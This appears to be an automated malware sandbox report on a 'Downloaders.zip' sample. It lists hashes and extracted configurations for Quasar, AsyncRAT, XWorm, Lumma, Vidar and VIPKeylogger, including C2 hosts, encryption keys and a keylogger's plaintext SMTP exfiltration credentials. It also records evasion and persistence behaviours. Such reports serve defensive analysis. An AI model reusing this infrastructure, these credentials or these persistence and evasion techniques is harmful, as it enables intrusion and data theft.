Resubmissions
13-02-2025 05:01
250213-fnkwtstpgw 1013-02-2025 04:24
250213-e1kk6atmaz 1013-02-2025 04:08
250213-eqe8patkgx 812-02-2025 23:56
250212-3yzt3azrdx 1012-02-2025 23:44
250212-3rgd5szmbm 1012-02-2025 23:19
250212-3a9dlazkep 1012-02-2025 13:32
250212-qs211ssrfr 1012-02-2025 03:00
250212-dhrfbaxnhm 1012-02-2025 02:51
250212-dcketaxnhz 10Analysis
-
max time kernel
518s -
max time network
819s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
02-02-2025 18:19
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win10ltsc2021-20250128-en
Errors
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Malware Config
Extracted
lumma
https://cloudewahsj.shop/api
https://rabidcowse.shop/api
https://noisycuttej.shop/api
https://tirepublicerj.shop/api
https://framekgirus.shop/api
https://wholersorie.shop/api
https://abruptyopsn.shop/api
https://nearycrepso.shop/api
Extracted
quasar
1.4.1
ZJEB
VIPEEK1990-25013.portmap.host:25013
ad21b115-2c1b-40cb-adba-a50736b76c21
-
encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Service
-
subdirectory
SubDir
Extracted
asyncrat
0.5.7B
Default
96.248.52.125:8031
adobe_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
update.exe
-
install_folder
%Temp%
Extracted
quasar
1.4.1
Office04
192.168.43.241:4782
193.161.193.99:20466
0517af80-95f0-4a6d-a904-5b7ee8faa157
-
encryption_key
6095BF6D5D58D02597F98370DFD1CCEB782F1EDD
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
SubDir
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
SolaraFake
anyone-blogging.gl.at.ply.gg:22284
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
Windows.exe
-
install_folder
%Temp%
Extracted
quasar
1.4.1
microsoft
193.161.193.99:25170
06cb3c8b-d800-42d6-af01-12c4e1f138b0
-
encryption_key
95C77D90C8A49F5740548C8A0A430C41732B639C
-
install_name
runtime.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Runtime
Extracted
vipkeylogger
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
[email protected] - Password:
^rtEwRy2 - Email To:
[email protected]
Extracted
vidar
https://t.me/m08mbk
https://steamcommunity.com/profiles/76561199820567237
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
quasar
1.4.0
Office04
137.184.144.245:4782
6cfe4a65-c41d-4b02-9ae9-e727a748ae84
-
encryption_key
B702BA239316FCF317B584A351F2EC1696EBE772
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java updater
-
subdirectory
SubDir
Extracted
quasar
1.4.0
Target
127.0.0.1:6070
affasdqa.ddns.net:6070
haffasdqa.duckdns.org:6070
670d21b7-71ed-4958-9ba7-a58fa54d8203
-
encryption_key
25B2622CE0635F9A273AB61B1B7D7B94220AC509
-
install_name
svhoste.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhoste
-
subdirectory
SubDir
Extracted
xworm
5.0
185.208.156.62:9009
Iuf47JITa74lSJjB
-
install_file
USB.exe
Extracted
quasar
1.3.0.0
sigorta
213.238.177.46:1604
QSR_MUTEX_dxT1m3RtSBLlUoRqXL
-
encryption_key
AZfjKXCnqT1oHdxEyyKo
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.3.0.0
Office04
217.195.197.192:1604
QSR_MUTEX_DQpXzWAWO0woFwXvN1
-
encryption_key
2Q8Og1wqw9TVfe3boxCg
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
Windows Client
148.163.102.170:4782
4c18e02c-7c39-4a5e-bbef-16fe13828101
-
encryption_key
73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26
-
install_name
Sever Startup.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Startup
-
subdirectory
Windows Startup
Signatures
-
Asyncrat family
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2972 MpCmdRun.exe -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/8148-39101-0x0000000000A60000-0x0000000000A70000-memory.dmp family_xworm -
Lumma family
-
Quasar family
-
Quasar payload 33 IoCs
resource yara_rule behavioral1/files/0x000c000000027ec4-1205.dat family_quasar behavioral1/memory/1980-1565-0x0000000000AB0000-0x0000000000DD4000-memory.dmp family_quasar behavioral1/files/0x000b000000027efc-2417.dat family_quasar behavioral1/memory/5500-2844-0x00000000007A0000-0x0000000000AC4000-memory.dmp family_quasar behavioral1/files/0x0008000000027f0f-32332.dat family_quasar behavioral1/memory/6120-32341-0x0000000000060000-0x0000000000394000-memory.dmp family_quasar behavioral1/files/0x000a000000027f3a-32748.dat family_quasar behavioral1/memory/5864-32756-0x0000000000F60000-0x0000000001284000-memory.dmp family_quasar behavioral1/files/0x0012000000027ef9-33176.dat family_quasar behavioral1/memory/4728-33184-0x0000000000F40000-0x0000000000FC4000-memory.dmp family_quasar behavioral1/files/0x0009000000027f85-37044.dat family_quasar behavioral1/memory/5796-37054-0x0000000000B80000-0x0000000000C04000-memory.dmp family_quasar behavioral1/memory/7444-44245-0x0000000000130000-0x000000000018E000-memory.dmp family_quasar behavioral1/files/0x00040000000165ac-44251.dat family_quasar behavioral1/memory/7944-44271-0x0000000000AC0000-0x0000000000B1E000-memory.dmp family_quasar behavioral1/memory/3144-44273-0x0000000000560000-0x00000000005BE000-memory.dmp family_quasar behavioral1/files/0x00060000000166d9-44278.dat family_quasar behavioral1/memory/7592-44288-0x0000000000950000-0x0000000000C74000-memory.dmp family_quasar behavioral1/files/0x0008000000016c26-44294.dat family_quasar behavioral1/files/0x000a000000016c35-44309.dat family_quasar behavioral1/files/0x0007000000023e1b-44324.dat family_quasar behavioral1/files/0x00050000000271d2-44365.dat family_quasar behavioral1/files/0x000300000002765e-44420.dat family_quasar behavioral1/files/0x0010000000027961-44428.dat family_quasar behavioral1/files/0x0011000000027ae0-46146.dat family_quasar behavioral1/files/0x000c000000027c7b-46957.dat family_quasar behavioral1/files/0x000b000000027c7f-46968.dat family_quasar behavioral1/files/0x000b000000027c81-46983.dat family_quasar behavioral1/files/0x000b000000027c85-46997.dat family_quasar behavioral1/files/0x00550000000273e6-47023.dat family_quasar behavioral1/files/0x000b000000027c89-47036.dat family_quasar behavioral1/files/0x000b000000027c8d-47057.dat family_quasar behavioral1/files/0x000b000000027c92-47077.dat family_quasar -
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vidar family
-
Vipkeylogger family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000027efb-2069.dat family_asyncrat behavioral1/files/0x000a000000027f02-32300.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vbc.exe -
pid Process 7160 powershell.exe 5780 powershell.exe 7140 powershell.exe 4440 powershell.exe 2976 powershell.exe -
Downloads MZ/PE file 47 IoCs
flow pid Process 294 4720 4363463463464363463463463.exe 308 3504 New Text Document mod.exe 310 3504 New Text Document mod.exe 315 3504 New Text Document mod.exe 275 3504 New Text Document mod.exe 275 3504 New Text Document mod.exe 326 5648 svc.exe 428 3504 New Text Document mod.exe 254 4720 4363463463464363463463463.exe 397 4720 4363463463464363463463463.exe 278 3504 New Text Document mod.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 285 4720 4363463463464363463463463.exe 286 3504 New Text Document mod.exe 312 3504 New Text Document mod.exe 429 3504 New Text Document mod.exe 301 3532 Explorer.EXE 330 4720 4363463463464363463463463.exe 392 3504 New Text Document mod.exe 295 3504 New Text Document mod.exe 432 3504 New Text Document mod.exe 337 5648 svc.exe 280 3504 New Text Document mod.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 405 1796 spoofer.exe 393 3504 New Text Document mod.exe 425 3504 New Text Document mod.exe 436 4720 4363463463464363463463463.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS procexp64.exe File created C:\Windows\system32\Drivers\PROCEXP152.SYS procexp64.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe procexp64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "\"C:\\PROGRAM FILES\\SYSINTERNALS\\PROCEXP64.EXE\"" procexp64.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe procexp64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "\"C:\\PROGRAM FILES\\SYSINTERNALS\\PROCEXP64.EXE\"" procexp64.exe -
Modifies Windows Firewall 2 TTPs 56 IoCs
pid Process 7128 netsh.exe 5604 netsh.exe 2596 netsh.exe 3200 netsh.exe 7604 netsh.exe 6380 netsh.exe 4844 netsh.exe 6488 netsh.exe 7272 netsh.exe 4328 netsh.exe 5132 netsh.exe 692 netsh.exe 5856 netsh.exe 3696 netsh.exe 5116 netsh.exe 7068 netsh.exe 1084 netsh.exe 6304 netsh.exe 6760 netsh.exe 7612 netsh.exe 4796 netsh.exe 1080 netsh.exe 7684 netsh.exe 6152 netsh.exe 7244 netsh.exe 7440 netsh.exe 7176 netsh.exe 5648 netsh.exe 5320 netsh.exe 8028 netsh.exe 8124 netsh.exe 7216 netsh.exe 7960 netsh.exe 6808 netsh.exe 5220 netsh.exe 4920 netsh.exe 6812 netsh.exe 3632 netsh.exe 6232 netsh.exe 6336 netsh.exe 6688 netsh.exe 7868 netsh.exe 2308 netsh.exe 1444 netsh.exe 4956 netsh.exe 7732 netsh.exe 6660 netsh.exe 2204 netsh.exe 5512 netsh.exe 6276 netsh.exe 7532 netsh.exe 880 netsh.exe 7220 netsh.exe 6280 netsh.exe 2192 netsh.exe 7920 netsh.exe -
Sets service image path in registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" procexp64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" procexp64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gfe4e8_4016\ImagePath = "\\??\\C:\\Windows\\Temp\\gfe4e8_4016.sys" vbc.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vbc.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation svc.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation AsyncClient.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation Solara_Protect.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation yoda.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe Key value queried \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Control Panel\International\Geo\Nation seksiak.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5772 cmd.exe 3540 powershell.exe -
Executes dropped EXE 61 IoCs
pid Process 4392 TORRENTOLD-1.exe 2140 TORRENTOLD-1.exe 4272 TORRENTOLD-1.exe 1500 GRN.exe 4408 test.exe 3004 GREEN.exe 1340 BLACKKKK.exe 2520 YLW.exe 1560 BLACK.exe 2116 GREEEEEN.exe 1920 LXIX.exe 3764 CL.exe 4148 ImageEditorforWP.exe 4268 1.exe 1772 inst.exe 4636 svchost015.exe 4108 nvc.exe 1980 seksiak.exe 3292 update.exe 1884 3.exe 5596 AsyncClient.exe 5500 discord.exe 5648 seksiak.exe 5428 update.exe 6776 zx.exe 4496 zx.exe 5648 svc.exe 5364 ScreenSync.exe 6668 InstallSetup.exe 6572 suwce.exe 7048 crack.exe 4444 Solara_Protect.exe 4740 k360.exe 6120 Client-built.exe 6656 runtime.exe 5176 temp_25008.exe 6276 temp_25008.exe 5360 temp_25024.exe 1832 temp_25027.exe 7140 seksiak.exe 6320 Windows.exe 1916 seksiak.exe 5480 seksiak.exe 6556 seksiak.exe 6804 seksiak.exe 6912 seksiak.exe 1540 svc1.exe 7116 svc1.exe 6056 yoda.exe 1688 Plenty.com 1796 spoofer.exe 6100 prueba.exe 2956 seksiak.exe 5292 seksiak.exe 6216 updater.exe 6828 svc2.exe 6820 svc2.exe 6184 din.exe 6904 putty.exe 5864 Servers.exe 5956 c3.exe -
Loads dropped DLL 10 IoCs
pid Process 4496 zx.exe 4496 zx.exe 4496 zx.exe 4496 zx.exe 4496 zx.exe 6276 temp_25008.exe 6276 temp_25008.exe 6276 temp_25008.exe 6276 temp_25008.exe 6276 temp_25008.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/4016-1193-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1194-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1209-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1208-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1211-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1219-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1224-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1229-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1220-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1210-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1207-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1206-0x0000000140000000-0x00000001405B7000-memory.dmp themida behavioral1/memory/4016-1212-0x0000000140000000-0x00000001405B7000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" nvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\3C9B2874F40869161091\\3C9B2874F40869161091.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " CL.exe Set value (str) \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\Desktop\\Mal\\a\\nvc.exe" nvc.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: procexp64.exe File opened (read-only) \??\Y: procexp64.exe File opened (read-only) \??\J: procexp64.exe File opened (read-only) \??\W: procexp64.exe File opened (read-only) \??\P: procexp64.exe File opened (read-only) \??\R: procexp64.exe File opened (read-only) \??\W: procexp64.exe File opened (read-only) \??\Y: procexp64.exe File opened (read-only) \??\I: procexp64.exe File opened (read-only) \??\Z: procexp64.exe File opened (read-only) \??\D: procexp64.exe File opened (read-only) \??\G: procexp64.exe File opened (read-only) \??\I: procexp64.exe File opened (read-only) \??\Z: procexp64.exe File opened (read-only) \??\B: procexp64.exe File opened (read-only) \??\M: procexp64.exe File opened (read-only) \??\V: procexp64.exe File opened (read-only) \??\T: procexp64.exe File opened (read-only) \??\U: procexp64.exe File opened (read-only) \??\V: procexp64.exe File opened (read-only) \??\N: procexp64.exe File opened (read-only) \??\N: procexp64.exe File opened (read-only) \??\D: procexp64.exe File opened (read-only) \??\B: procexp64.exe File opened (read-only) \??\H: procexp64.exe File opened (read-only) \??\O: procexp64.exe File opened (read-only) \??\T: procexp64.exe File opened (read-only) \??\A: procexp64.exe File opened (read-only) \??\X: procexp64.exe File opened (read-only) \??\J: procexp64.exe File opened (read-only) \??\K: procexp64.exe File opened (read-only) \??\L: procexp64.exe File opened (read-only) \??\U: procexp64.exe File opened (read-only) \??\M: procexp64.exe File opened (read-only) \??\K: procexp64.exe File opened (read-only) \??\L: procexp64.exe File opened (read-only) \??\O: procexp64.exe File opened (read-only) \??\A: procexp64.exe File opened (read-only) \??\S: procexp64.exe File opened (read-only) \??\X: procexp64.exe File opened (read-only) \??\G: procexp64.exe File opened (read-only) \??\H: procexp64.exe File opened (read-only) \??\P: procexp64.exe File opened (read-only) \??\Q: procexp64.exe File opened (read-only) \??\R: procexp64.exe File opened (read-only) \??\S: procexp64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 275 bitbucket.org 432 raw.githubusercontent.com 466 discord.com 629 6.tcp.eu.ngrok.io 649 0.tcp.eu.ngrok.io 831 0.tcp.in.ngrok.io 171 0.tcp.eu.ngrok.io 284 raw.githubusercontent.com 604 raw.githubusercontent.com 779 6.tcp.eu.ngrok.io 274 bitbucket.org 285 raw.githubusercontent.com 777 raw.githubusercontent.com 465 discord.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 338 checkip.dyndns.org 359 reallyfreegeoip.org 360 reallyfreegeoip.org 462 ip-api.com 536 ip-addr.es 538 ip-addr.es 679 ip-addr.es 701 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a000000027f06-32259.dat autoit_exe -
flow pid Process 116 2336 firefox.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt procexp64.exe File created C:\Windows\system32\runtime.exe Client-built.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5564 tasklist.exe 6004 tasklist.exe 1652 tasklist.exe 4612 tasklist.exe 3364 tasklist.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4392 set thread context of 4272 4392 TORRENTOLD-1.exe 128 PID 4148 set thread context of 4636 4148 ImageEditorforWP.exe 149 PID 1772 set thread context of 4016 1772 inst.exe 150 PID 6572 set thread context of 7080 6572 suwce.exe 220 PID 1540 set thread context of 7116 1540 svc1.exe 271 PID 6828 set thread context of 6820 6828 svc2.exe 308 -
resource yara_rule behavioral1/memory/6492-32886-0x00007FFBD44D0000-0x00007FFBD4B35000-memory.dmp upx behavioral1/memory/6492-32888-0x00007FFBF50B0000-0x00007FFBF50BF000-memory.dmp upx behavioral1/memory/6492-32887-0x00007FFBF4FF0000-0x00007FFBF5017000-memory.dmp upx behavioral1/memory/6492-32896-0x00007FFBD67D0000-0x00007FFBD694F000-memory.dmp upx behavioral1/memory/6492-32899-0x00007FFBD84A0000-0x00007FFBD84D3000-memory.dmp upx behavioral1/memory/6492-32898-0x00007FFBF5060000-0x00007FFBF506D000-memory.dmp upx behavioral1/memory/6492-32897-0x00007FFBED230000-0x00007FFBED249000-memory.dmp upx behavioral1/memory/6492-32901-0x00007FFBD6DE0000-0x00007FFBD6EAE000-memory.dmp upx behavioral1/memory/6492-32900-0x00007FFBD5000000-0x00007FFBD5533000-memory.dmp upx behavioral1/memory/6492-32895-0x00007FFBD8580000-0x00007FFBD85A5000-memory.dmp upx behavioral1/memory/6492-32894-0x00007FFBED4B0000-0x00007FFBED4C9000-memory.dmp upx behavioral1/memory/6492-32893-0x00007FFBE40B0000-0x00007FFBE40DB000-memory.dmp upx behavioral1/memory/6492-32904-0x00007FFBD6B80000-0x00007FFBD6C33000-memory.dmp upx behavioral1/memory/6492-32903-0x00007FFBF1600000-0x00007FFBF160D000-memory.dmp upx behavioral1/memory/6492-32902-0x00007FFBEC250000-0x00007FFBEC264000-memory.dmp upx behavioral1/memory/6492-32952-0x00007FFBD44D0000-0x00007FFBD4B35000-memory.dmp upx behavioral1/memory/6492-33075-0x00007FFBD67D0000-0x00007FFBD694F000-memory.dmp upx behavioral1/memory/6492-33074-0x00007FFBD8580000-0x00007FFBD85A5000-memory.dmp upx behavioral1/memory/6492-33115-0x00007FFBD84A0000-0x00007FFBD84D3000-memory.dmp upx behavioral1/memory/6492-33116-0x00007FFBD5000000-0x00007FFBD5533000-memory.dmp upx behavioral1/memory/6492-33117-0x00007FFBD6DE0000-0x00007FFBD6EAE000-memory.dmp upx behavioral1/memory/6492-33150-0x00007FFBED230000-0x00007FFBED249000-memory.dmp upx behavioral1/memory/6492-33159-0x00007FFBD84A0000-0x00007FFBD84D3000-memory.dmp upx behavioral1/memory/6492-33163-0x00007FFBF1600000-0x00007FFBF160D000-memory.dmp upx behavioral1/memory/6492-33164-0x00007FFBD6B80000-0x00007FFBD6C33000-memory.dmp upx behavioral1/memory/6492-33162-0x00007FFBEC250000-0x00007FFBEC264000-memory.dmp upx behavioral1/memory/6492-33161-0x00007FFBD6DE0000-0x00007FFBD6EAE000-memory.dmp upx behavioral1/memory/6492-33160-0x00007FFBD5000000-0x00007FFBD5533000-memory.dmp upx behavioral1/memory/6492-33158-0x00007FFBF5060000-0x00007FFBF506D000-memory.dmp upx behavioral1/memory/6492-33157-0x00007FFBD67D0000-0x00007FFBD694F000-memory.dmp upx behavioral1/memory/6492-33156-0x00007FFBD8580000-0x00007FFBD85A5000-memory.dmp upx behavioral1/memory/6492-33155-0x00007FFBED4B0000-0x00007FFBED4C9000-memory.dmp upx behavioral1/memory/6492-33154-0x00007FFBE40B0000-0x00007FFBE40DB000-memory.dmp upx behavioral1/memory/6492-33153-0x00007FFBF50B0000-0x00007FFBF50BF000-memory.dmp upx behavioral1/memory/6492-33152-0x00007FFBF4FF0000-0x00007FFBF5017000-memory.dmp upx behavioral1/memory/6492-33151-0x00007FFBD44D0000-0x00007FFBD4B35000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\360\360Safe\safemon\360tray.exe k360.exe File opened for modification C:\Program Files (x86)\360\360sd\360sd.exe k360.exe File opened for modification C:\Program Files\ApproveComplete.ico Explorer.EXE -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\RealSheffield yoda.exe File opened for modification C:\Windows\LeanMaintaining yoda.exe File opened for modification C:\Windows\CopyThreats yoda.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000027ef0-2422.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1844 4392 WerFault.exe 125 5176 4636 WerFault.exe 149 5508 4268 WerFault.exe 147 5728 1884 WerFault.exe 164 6800 5364 WerFault.exe 187 6036 5364 WerFault.exe 187 1668 1540 WerFault.exe 270 5264 6828 WerFault.exe 307 2264 6904 WerFault.exe 312 -
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language suwce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language temp_25024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svc1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language putty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 